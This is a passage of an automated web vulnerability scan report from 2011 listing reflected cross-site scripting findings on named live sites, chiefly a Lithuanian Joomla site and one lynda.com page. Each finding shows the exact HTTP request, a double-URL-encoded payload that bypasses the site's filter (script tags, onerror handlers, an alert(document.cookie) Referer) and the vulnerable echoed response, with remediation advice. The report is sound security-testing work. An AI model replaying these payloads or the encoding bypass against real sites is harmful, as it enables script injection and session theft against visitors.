The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80ed3%2522%253e%253ca%253e48472f1e3b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80ed3"><a>48472f1e3b7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /saugi-joomla.html?80ed3%2522%253e%253ca%253e48472f1e3b7=1 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14438


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<link href="/saugi-joomla.feed?80ed3"><a>48472f1e3b7=1&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1236. http://www.lithuanianjoomla.com/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24162%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f837d9381b was submitted in the REST URL parameter 1. This input was echoed as 24162"><script>alert(1)</script>0f837d9381b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /saugi-joomla24162%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f837d9381b/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:40 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 17752


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/saugi-joomla24162"><script>alert(1)</script>0f837d9381b/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html" />
...[SNIP]...

4.1237. http://www.lithuanianjoomla.com/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ebcd%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eb333f069742 was submitted in the REST URL parameter 2. This input was echoed as 5ebcd"><img src=a onerror=alert(1)>b333f069742 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /saugi-joomla/5ebcd%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eb333f069742 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:23 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 17490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/saugi-joomla/5ebcd"><img src=a onerror=alert(1)>b333f069742" />
...[SNIP]...

4.1238. http://www.lithuanianjoomla.com/templates/beez_20/css/general.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lithuanianjoomla.com
Path:   /templates/beez_20/css/general.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1569d%2522%253e%253ca%2520b%253dc%253eae4191a6da8 was submitted in the REST URL parameter 4. This input was echoed as 1569d"><a b=c>ae4191a6da8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /templates/beez_20/css/1569d%2522%253e%253ca%2520b%253dc%253eae4191a6da8 HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:26 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13571


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/css/1569d"><a b=c>ae4191a6da8" />
...[SNIP]...

4.1239. http://www.lithuanianjoomla.com/templates/beez_20/css/general_konqueror.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lithuanianjoomla.com
Path:   /templates/beez_20/css/general_konqueror.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d7e0%2522a%253d%2522b%252267286fd9055 was submitted in the REST URL parameter 4. This input was echoed as 5d7e0"a="b"67286fd9055 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /templates/beez_20/css/5d7e0%2522a%253d%2522b%252267286fd9055 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:22 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 19072


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/css/5d7e0"a="b"67286fd9055" />
...[SNIP]...

4.1240. http://www.lithuanianjoomla.com/templates/beez_20/css/layout.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /templates/beez_20/css/layout.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 810eb%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253ef5ac2d2bb51 was submitted in the REST URL parameter 4. This input was echoed as 810eb"><x style=x:expression(alert(1))>f5ac2d2bb51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /templates/beez_20/css/810eb%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253ef5ac2d2bb51 HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:25 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13596


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/css/810eb"><x style=x:expression(alert(1))>f5ac2d2bb51" />
...[SNIP]...

4.1241. http://www.lithuanianjoomla.com/templates/beez_20/css/personal.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /templates/beez_20/css/personal.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31940%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253eece9984528c was submitted in the REST URL parameter 4. This input was echoed as 31940"><x style=x:expression(alert(1))>ece9984528c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /templates/beez_20/css/31940%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253eece9984528c HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:39 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13596


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/css/31940"><x style=x:expression(alert(1))>ece9984528c" />
...[SNIP]...

4.1242. http://www.lithuanianjoomla.com/templates/beez_20/css/position.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /templates/beez_20/css/position.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99a52%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e492a0e0082e was submitted in the REST URL parameter 4. This input was echoed as 99a52"><img src=a onerror=alert(1)>492a0e0082e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /templates/beez_20/css/99a52%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e492a0e0082e HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:31 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13588


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/css/99a52"><img src=a onerror=alert(1)>492a0e0082e" />
...[SNIP]...

4.1243. http://www.lithuanianjoomla.com/templates/beez_20/css/print.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /templates/beez_20/css/print.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5411f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9ac2645424 was submitted in the REST URL parameter 4. This input was echoed as 5411f"><img src=a onerror=alert(1)>9ac2645424 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /templates/beez_20/css/5411f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9ac2645424 HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:05 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13591


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/css/5411f"><img src=a onerror=alert(1)>9ac2645424" />
...[SNIP]...

4.1244. http://www.lithuanianjoomla.com/templates/beez_20/javascript/hide.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lithuanianjoomla.com
Path:   /templates/beez_20/javascript/hide.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eb32%2522a%253d%2522b%25225278668874e was submitted in the REST URL parameter 4. This input was echoed as 5eb32"a="b"5278668874e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /templates/beez_20/javascript/5eb32%2522a%253d%2522b%25225278668874e HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 19189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/javascript/5eb32"a="b"5278668874e" />
...[SNIP]...

4.1245. http://www.lithuanianjoomla.com/templates/beez_20/javascript/md_stylechanger.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /templates/beez_20/javascript/md_stylechanger.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 138ab%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9db6c5caf79 was submitted in the REST URL parameter 4. This input was echoed as 138ab"><img src=a onerror=alert(1)>9db6c5caf79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /templates/beez_20/javascript/138ab%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9db6c5caf79 HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:35 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13599


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/beez_20/javascript/138ab"><img src=a onerror=alert(1)>9db6c5caf79" />
...[SNIP]...

4.1246. http://www.lithuanianjoomla.com/templates/system/css/system.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /templates/system/css/system.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b767%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e5cd244f2c6a was submitted in the REST URL parameter 4. This input was echoed as 5b767"><img src=a onerror=alert(1)>5cd244f2c6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /templates/system/css/5b767%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e5cd244f2c6a HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:50 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 19205


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/templates/system/css/5b767"><img src=a onerror=alert(1)>5cd244f2c6a" />
...[SNIP]...

4.1247. http://www.lynda.com/landing/softwaretraining.aspx [AWKeyWord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lynda.com
Path:   /landing/softwaretraining.aspx

Issue detail

The value of the AWKeyWord request parameter is copied into the HTML document as plain text between tags. The payload c9632<script>alert(1)</script>217befb9173 was submitted in the AWKeyWord parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /landing/softwaretraining.aspx?AWKeyWord=Joomla!c9632<script>alert(1)</script>217befb9173&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Online&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/ HTTP/1.1
Host: www.lynda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=KWWVWPSw5CYMQ; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
